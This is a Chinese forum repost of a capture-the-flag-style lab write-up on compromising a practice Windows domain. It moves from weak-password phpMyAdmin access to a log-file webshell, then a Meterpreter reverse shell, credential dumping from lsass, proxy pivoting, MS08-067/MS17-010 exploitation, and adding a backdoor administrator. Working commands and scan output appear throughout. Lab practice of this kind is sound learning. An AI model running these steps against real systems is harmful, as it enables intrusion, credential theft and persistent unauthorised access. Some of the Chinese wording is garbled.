ToB企服应用市场:ToB评测及商务社交产业平台

标题: 域渗出之ATT&CK实战系列——红队实战（一） [打印本页]

---

作者: 徐锦洪    时间: 2024-6-22 02:20
标题: 域渗出之ATT&CK实战系列——红队实战（一）
目录

• 媒介
  
• 环境搭建
  
• 外围打点
  
  
  
  • 信息收集
    
  • phpmyadmin全局日志getshell
    
  
  
• 内网信息收集
  
  
  
  • msf上线
    
  • mimikatz抓取明文密码
    
  • 域信息收集
    
  
  
• 横向移动
  
  
  
  • msf+proxychains搭建socks5隧道
    
  • MS08-067漏洞使用
    
  • MS17-010漏洞使用
    
  • 获取域控服务器
    
  
  
• 总结
  

媒介

这个靶场是红日安全团队推出的红队实战系列第一个靶场，其中包括了漏洞使用、内网搜集、横向移动、构建通道、持久控制等多个环节。是一个不错的学习内网渗出的环境，这里仅记录我的打靶学习过程。
环境搭建

靶场下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
文件下载下来有三个压缩包，分别对应域中三台主机：

• vulnstack-win7 对应Windows 7是Web服务器
  
• vulnstack-Win2K3 Metasploitable 对应Windows Server 2003是域成员
  
• vulnstack-winserver08 对应Windows Server 2008是域控
  

网络拓扑示意图：

假造机网络配置：

• Web服务器（Windows 7）：需配置为双网卡模式，网络适配器设置为自界说（VMnet1仅主机模式），另外再添加一个网络适配器设置为NAT模式
  
• 域成员（Windows Server 2003）：网络适配器设置为自界说（VMnet1仅主机模式）
  
• 域控（Windows Server 2008）：网络适配器设置为自界说（VMnet1仅主机模式）
  
• 攻击机（Kali）：设置为NAT模式
  

此时Windows 7和Windows 2003及Windows Server 2008处于同一内网中，kali仅可以访问到windows 7。
假造机IP地址分配：

• kali：外网 192.168.88.128
  
• Windows 7：外网 192.168.88.137，内网 193.168.52.143
  
• Windows Server 2003：内网 192.168.52.141
  
• Windows Server 2008：内网 192.168.52.138
  

启动Windows 7的C盘下的phpstudy开启web服务，外网可访问：

如果出现错误“phpstudy已经停止工作”，办理方案参考：https://blog.csdn.net/qq_43871179/article/details/125307581
全部都准备完毕以后就可以开始渗出了！
外围打点

信息收集

主机发现：

端口扫描：
首先使用nmap扫一下web服务器的ip地址：

扫到了一个80端口，访问80端口，发现是一个phpStudy探针页面：

袒露了网站绝对路径为C:/phpStudy/WWW，php版本为5.4.45，GPC关闭，支持数据库等信息，底部还有MySQL数据库连接检测的功能。
继续使用nmap扫一下MySQL数据3306端口是否袒露：

可以确定3306端口对公网袒露，测试弱口令root/root是否可以连接数据库：

数据库连接正常：

目录扫描：
继续使用dirsearch扫描一下网站目录：

发现存在phpmyadmin目录。
phpmyadmin全局日志getshell

使用弱口令root/root对phpmyadmin举行登录：

登录乐成，实验是否可以直接写入一句话木马，查看体系变量secure_file_priv的值：

此处的变量值为NULL，即没设置允许操作的目录，以是没法导入和导出到文件。
试试看能不能通过日志文件来写入一句话木马，查看全局变量general_log和genera_log_file的值：

此处全局日志功能是关闭的，若开启后，执行过的sql语句都会保存到stu1.log文件。以是这里开启全局日志，并根据前面网站根目录将日志保存位置修改为C:/phpStudy/WWW/shell.php

1. set global general_log=on;
2. set global general_log_file='C:/phpStudy/WWW/shell.php';

复制代码

再次查询全局变量：

查询一句话木马select '';写入日志：

使用蚁剑连接一句话木马http://192.168.88.137/shell.php：

在根目录可以看到除了phpmyadmin，还有一个cms体系yxcms和一个备份文件beifen.rar，到这里后台getshell完成。
内网信息收集

msf上线

通过msf天生一个反弹连接的木马cc.exe:

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe -o cc.exe

复制代码

将msf木马上传至Win7主机（没有杀软不用免杀）：

Kali本机使用msf开启监听模式：

1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set lhost 192.168.88.128
4. run

复制代码

使用蚁剑的假造终端执行网站根目录下的cc.exe木马，之后乐成获取meterpreter shell：

到这很顺利，基本拿下了web服务器，接下来继续对内网举行渗出。
mimikatz抓取明文密码

通常获取meterpreter shell之后是一个低权限，需要举行提权。但是靶场环境比较简朴，使用getuid下令获取到当前的用户是管理员账号GOD\Administrator，而且使用getsystem下令实验自动提权，很容易就提升到了system权限。

如今是一个比较高的权限，以是直接使用mimikatz来抓取明文密码（mimikatz模块已经合并为kiwi模块，使用kiwi模块需要system权限）。
查看当前体系信息，可以看出目标体系是64位的：

kiwi模块同时支持32位和64位的体系，但是该模块默认是加载32位的体系，以是如果目标主机是64位体系的话，直接默认加载该模块会导致很多功能无法使用，将meterpreter进程迁移到一个64位步调的进程中，才能加载kiwi而且查看体系明文。

查看当前进程列表，可以看出lsass进程是以system权限运行，PID为504：

如今需要把meterpreter shell进程迁移到PID为504的lsass.exe进程里：

1. migrate 504

复制代码

接着加载kiwi模块，枚举所有凭据：

看到获取到的Administrator的明文密码为hongrisec@2019。
可以开启3389端口长途桌面，关闭防火墙，再使用明文口令长途桌面登录这台Web服务器，但是我们已经拿到system权限的shell，以是显得有点多此一举。
域信息收集

域信息的收集就主要包括域内主机体系信息收集，网络拓扑信息收集，漏洞信息收集等。
这里使用shell切换到目标主机的cmd（chcp 65001可以避免cmd字符中文乱码）：

使用systeminfo获取主机具体信息：

使用net config Workstation下令查看当前计算机名称以及所在的工作站域等信息：

使用net group /domain下令查看域内所有用户列表（system权限）：

使用net group "domain computers" /domain下令查看域成员计算机列表（system权限）：

使用net group "domain admins" /domain下令查看域管理员用户（system权限）：

综上可以基本判断出：
当前用户是管理员账号GOD\Administrator，当前主机内网ip地址为192.168.52.137，内网网段为192.168.52.0/24，当前域为god.org，本机计算机名称是stu1，域管理员用户是OWA，另外还有两个域用户DEV1和ROOT-TVI862UBEH。
通常我们是不清晰内网拓扑的，以是这里先不着急，继续深入收集内网主机的信息。
如今已知内网网段为192.168.52.0/24，查看arp缓存表，发现另外两台内网主机ip地址分别为192.168.52.138和192.168.52.141，但是如今还不能确定它们的身份。

好消息是Win7已经安装了nmap工具，以是不需要再手动安装了，可以进一步针对192.168.52.0/24内网网段举行信息收集。

对内网网段举行nmap扫描：

1. cd C:\Program Files (x86)\Nmap && nmap.exe -sS -T4 -A 192.168.52.0/24

复制代码

拿到了一共三台主机的扫描信息：
192.168.52.138：

1. Nmap scan report for 192.168.52.138
2. Host is up (0.00s latency).
3. Not shown: 982 filtered ports
4. PORT      STATE SERVICE      VERSION
5. 53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
6. | dns-nsid:
7. |_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
8. 80/tcp    open  http         Microsoft IIS httpd 7.5
9. | http-methods:
10. |_  Potentially risky methods: TRACE
11. |_http-server-header: Microsoft-IIS/7.5
12. |_http-title: IIS7
13. 88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-20 12:59:44Z)
14. 135/tcp   open  msrpc        Microsoft Windows RPC
15. 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
16. 389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: god.org, Site: Default-First-Site-Name)
17. 445/tcp   open  microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
18. 464/tcp   open  kpasswd5?
19. 593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
20. 636/tcp   open  tcpwrapped
21. 3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: god.org, Site: Default-First-Site-Name)
22. 3269/tcp  open  tcpwrapped
23. 49154/tcp open  msrpc        Microsoft Windows RPC
24. 49155/tcp open  msrpc        Microsoft Windows RPC
25. 49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
26. 49158/tcp open  msrpc        Microsoft Windows RPC
27. 49161/tcp open  msrpc        Microsoft Windows RPC
28. 49167/tcp open  msrpc        Microsoft Windows RPC
29. MAC Address: 00:0C:29:22:33:12 (VMware)
30. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
31. Device type: general purpose|specialized|phone
32. Running: Microsoft Windows 2008|8.1|7|Phone|Vista
33. OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
34. OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
35. Network Distance: 1 hop
36. Service Info: Host: OWA; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
38. Host script results:
39. |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
40. |_nbstat: NetBIOS name: OWA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:22:33:12 (VMware)
41. | smb-os-discovery:
42. |   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
43. |   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
44. |   Computer name: owa
45. |   NetBIOS computer name: OWA\x00
46. |   Domain name: god.org
47. |   Forest name: god.org
48. |   FQDN: owa.god.org
49. |_  System time: 2024-06-20T21:02:17+08:00
50. | smb-security-mode:
51. |   account_used: <blank>
52. |   authentication_level: user
53. |   challenge_response: supported
54. |_  message_signing: required
55. | smb2-security-mode:
56. |   2.02:
57. |_    Message signing enabled and required
58. | smb2-time:
59. |   date: 2024-06-20T13:02:17
60. |_  start_date: 2024-06-19T14:33:31
62. TRACEROUTE
63. HOP RTT     ADDRESS
64. 1   0.00 ms 192.168.52.138

复制代码

可以看到192.168.52.138操作体系是Windows Server 2008 R2，计算机名是owa，以是基本可以确定192.168.52.138就是域控。
192.168.52.141：

1. Nmap scan report for 192.168.52.141
2. Host is up (0.00s latency).
3. Not shown: 987 closed ports
4. PORT     STATE SERVICE         VERSION
5. 21/tcp   open  ftp             Microsoft ftpd
6. |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
7. | ftp-syst:
8. |_  SYST: Windows_NT
9. 135/tcp  open  msrpc           Microsoft Windows RPC
10. 139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn
11. 445/tcp  open  microsoft-ds    Windows Server 2003 3790 microsoft-ds
12. 777/tcp  open  multiling-http?
13. 1025/tcp open  msrpc           Microsoft Windows RPC
14. 1028/tcp open  msrpc           Microsoft Windows RPC
15. 1029/tcp open  msrpc           Microsoft Windows RPC
16. 1030/tcp open  msrpc           Microsoft Windows RPC
17. 6002/tcp open  http            SafeNet Sentinel Protection Server 7.3
18. |_http-server-header: SentinelProtectionServer/7.3
19. |_http-title: Sentinel License Monitor
20. 7001/tcp open  afs3-callback?
21. 7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
22. |_http-server-header: SentinelKeysServer/1.0
23. |_http-title: Sentinel Keys License Monitor
24. 8099/tcp open  http            Microsoft IIS httpd 6.0
25. |_http-server-header: Microsoft-IIS/6.0
26. |_http-title: The page must be viewed over a secure channel
27. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
28. SF-Port777-TCP:V=7.80%I=7%D=6/20%Time=667427F4%P=i686-pc-windows-windows%r
29. SF:(TerminalServerCookie,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(Kerberos,
30. SF:5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(TerminalServ
31. SF:er,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01\0\t\xe0\x
32. SF:06");
33. MAC Address: 00:0C:29:1B:B5:0A (VMware)
34. Device type: general purpose
35. Running: Microsoft Windows XP|2003
36. OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
37. OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
38. Network Distance: 1 hop
39. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
41. Host script results:
42. |_clock-skew: mean: -3h59m59s, deviation: 5h39m23s, median: -7h59m58s
43. |_nbstat: NetBIOS name: ROOT-TVI862UBEH, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:1b:b5:0a (VMware)
44. | smb-os-discovery:
45. |   OS: Windows Server 2003 3790 (Windows Server 2003 5.2)
46. |   OS CPE: cpe:/o:microsoft:windows_server_2003::-
47. |   Computer name: root-tvi862ubeh
48. |   NetBIOS computer name: ROOT-TVI862UBEH\x00
49. |   Domain name: god.org
50. |   Forest name: god.org
51. |   FQDN: root-tvi862ubeh.god.org
52. |_  System time: 2024-06-20T21:02:19+08:00
53. | smb-security-mode:
54. |   account_used: guest
55. |   authentication_level: user
56. |   challenge_response: supported
57. |_  message_signing: disabled (dangerous, but default)
58. |_smb2-time: Protocol negotiation failed (SMB2)
60. TRACEROUTE
61. HOP RTT     ADDRESS
62. 1   0.00 ms 192.168.52.141

复制代码

可以看到192.168.52.141操作体系是Windows Server 2003，计算机名为root-tvi862ubeh，以是也基本可以确定192.168.52.141是另一个域成员。
192.168.52.143：

1. Nmap scan report for www.qiyuanxuetang.net (192.168.52.143)
2. Host is up (0.00s latency).
3. Not shown: 989 closed ports
4. PORT     STATE SERVICE      VERSION
5. 80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
6. |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
7. |_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
8. 135/tcp  open  msrpc        Microsoft Windows RPC
9. 139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
10. 445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
11. 1025/tcp open  msrpc        Microsoft Windows RPC
12. 1026/tcp open  msrpc        Microsoft Windows RPC
13. 1027/tcp open  msrpc        Microsoft Windows RPC
14. 1028/tcp open  msrpc        Microsoft Windows RPC
15. 1029/tcp open  msrpc        Microsoft Windows RPC
16. 1117/tcp open  msrpc        Microsoft Windows RPC
17. 3306/tcp open  mysql        MySQL (unauthorized)
18. Device type: general purpose
19. Running: Microsoft Windows 8.1|7|2008
20. OS CPE: cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2
21. OS details: Microsoft Windows 7 or 8.1 R1 or Server 2008 R2 SP1
22. Network Distance: 0 hops
23. Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows
25. Host script results:
26. |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
27. |_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:01:5e:ae (VMware)
28. | smb-os-discovery:
29. |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
30. |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
31. |   Computer name: stu1
32. |   NetBIOS computer name: STU1\x00
33. |   Domain name: god.org
34. |   Forest name: god.org
35. |   FQDN: stu1.god.org
36. |_  System time: 2024-06-20T21:04:10+08:00
37. | smb-security-mode:
38. |   account_used: guest
39. |   authentication_level: user
40. |   challenge_response: supported
41. |_  message_signing: disabled (dangerous, but default)
42. | smb2-security-mode:
43. |   2.02:
44. |_    Message signing enabled but not required
45. | smb2-time:
46. |   date: 2024-06-20T13:04:10
47. |_  start_date: 2024-06-19T15:38:20
49. Post-scan script results:
50. | clock-skew:
51. |   -2h39m59s:
52. |     192.168.52.138
53. |_    192.168.52.143 (www.qiyuanxuetang.net)
54. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
55. Nmap done: 256 IP addresses (3 hosts up) scanned in 325.12 seconds

复制代码

192.168.52.143也就是win7本机，计算机名为stu1。
接着使用nmap的脚本举行内网漏洞的扫描：

1. nmap --script=vuln -p 1-65535 192.168.52.143

复制代码

扫描发现win7（192.168.52.143）存在ms17-010漏洞。

1. nmap --script=vuln -p 1-65535 192.168.52.141

复制代码

扫描发现域成员（192.168.52.141）存在MS08-067和ms17-010漏洞。

1. nmap --script=vuln -p 1-65535 192.168.52.138

复制代码

扫描发现域控（192.168.52.138）同样存在ms17-010漏洞。
内网信息的收集到这就基本差不多了，因为Web服务器上来就拿到了管理员system权限，以是说难度降低了不少。
横向移动

如今拿到了Web服务器的meterpreter shell，但是还不能直接访问内网网段。需要添加到目标环境网络的路由，才能使msf可以通过Win7转发访问192.168.25.0/24网段。
使用run get_local_subnets取目标内网相关信息：

添加去往192.168.52.0/24网段的路由信息：

1. run autoroute -s 192.168.52.0/24

复制代码

实际上直接添加到0.0.0.0/0的路由也可以，Win7主机可达msf也都可以达。
msf+proxychains搭建socks5隧道

添加socks代理：
当前使用msf自带的模块对内网的主机举行探测时，msf的流量会根据路由信息直接送到对应的目标网段。但如果使用kali上其他的渗出工具，则需要一个代理帮助转发流量。这里就使用msf作为代理，由msf的路由将流量带入到内网中。具体做法就是加一个socks代理模块，监听本地的端口，然后再通过这个端口将流量转给msf即可。
我使用的是msf6环境，使用socks5代理模块：

1. use auxiliary/server/socks_proxy
2. set srvhost 127.0.0.1
3. run
5. # 默认监听在1080端口

复制代码

编辑/etc/proxychains.conf文件加上socks5代理服务器和端口：

试一试proxychains4代理本地的nmap能否扫到内网的域控：

1. proxychains4 nmap -sT -Pn 192.168.52.138 -p 445

复制代码

看到可以乐成访问，但是需要注意的时proxychains4只对tcp流量转发，以是udp和icmp都不能代理转发。以是使用使用proxychains4代理nmap扫描主机时，必须加上-sT和-Pn两个参数。
MS08-067漏洞使用

根据前面信息收集的漏洞扫描效果发现域成员Windows 2003开启了445端口SMB服务，同时也存在MS08-067和MS17-010两个漏洞。
先来看看MS08-067漏洞的使用：

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”，攻击者使用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote Procedure Call，长途过程调用）请求，造成栈缓冲区内存错误，从而被使用实施长途代码执行。
它影响了某些旧版本的Windows体系，包括：Windows 2000，Windows XP，Windows Server 2003

直接搜一下MS08-067漏洞的exp：

将payload设置为常规的反向tcp连接，试了几次都不乐成：

发现有路由，但是ping不通目标主机：

原因很有可能就是只有过去的路由，没有回来的路由，目标主机无法直接连接到攻击机，以是说反向连接行不通。
将payload设置为正向tcp连接bind_tcp试一试：

1. use exploit/windows/smb/ms08_067_netapi
2. set rhost 192.168.52.141
3. set payload windows/meterpreter/bind_tcp
4. set lport 4444
5. run

复制代码

采用正向tcp连接到445端口，proxychains代理nmap扫描445端口状态正常：

效果还是出现了问题，试了很多次始终无法正常连接（应该不是防火墙的问题），换了其他的正向payload还是无法乐成。。。有可能是我的msf版本比较高导致的无法正常连接。
参考：https://www.cnblogs.com/huaweiyun/p/15559938.html
MS17-010漏洞使用

前面的ms08-067漏洞暂时没有好的使用方案，继续另一个ms17-010漏洞。
永恒之蓝漏洞（ms17-010）是在445端口的SMB服务处置惩罚SMBv1请求时存在缓冲区溢出，造发展途代码执行漏洞，受影响的Windows版本有很多。
msf搜到的ms17-010漏洞exp有5种：

挨个试一试：
第一个exploit/windows/smb/ms17_010_eternalblue模块：

很明显不可，Windows server 2003是32位的，这个模块只支持64的体系。
第二个exploit/windows/smb/ms17_010_psexec模块，payload还是采用正向tcp连接：

仍然无法有效获取会话。
第三个auxiliary/admin/smb/ms17_010_command模块执行下令：

1. use auxiliary/admin/smb/ms17_010_command
2. set rhosts 192.168.52.141
3. set command whoami
4. run

复制代码

执行下令可以乐成，可以实验通过执行下令，开启3389端口举行长途桌面登录：
依次执行：

1. #开启3389端口
2. set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
4. #添加用户
5. set command net user blckder02 8888! /add
7. #添加管理员权限
8. set command net localgroup administrators blckder02 /add

复制代码

然后使用添加的用户登录：

1. proxychains rdesktop 192.168.52.141

复制代码

前面通过执行whoami下令回显的是sysytem权限，基本上这台域成员就已经拿下了。
获取域控服务器

根据前面信息收集的漏洞扫描效果域控服务器存在MS17-010漏洞，exploit/windows/smb/ms17_010_eternalblue模块和exploit/windows/smb/ms17_010_psexec模块正向连接仍然不好使。
下令执行模块auxiliary/admin/smb/ms17_010_command有效果：

1. use auxiliary/admin/smb/ms17_010_command
2. set rhosts 192.168.52.138
3. set command whoami
4. run

复制代码

以是接下来和windows server 2003主机的操作一样了，使用开启3389端口长途桌面登录。
靶场的文档里面还提到了WMI使用拿下域控的方法，需要准备一个vmiexec.vbs脚本和一些其他工具，显得复杂一些。
总结

整个打靶过程还是有不少收获的，整个过程大致就是，弱口令登录phpmyadmin，使用日志文件写入一句话木马，Web服务器getshell，使用msf反弹shell，内网扫描信息收集，流量代理转发，最后使用ms17_010漏洞拿下域成员和域控服务器。
实在靶场提供的漏洞环境远不止这些，还有redis getshell，MySQL提权，单子传递等，背面后单独复现一下，这次记录就到这里，共勉！
若有错误，接待指正！o(￣▽￣)ブ

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4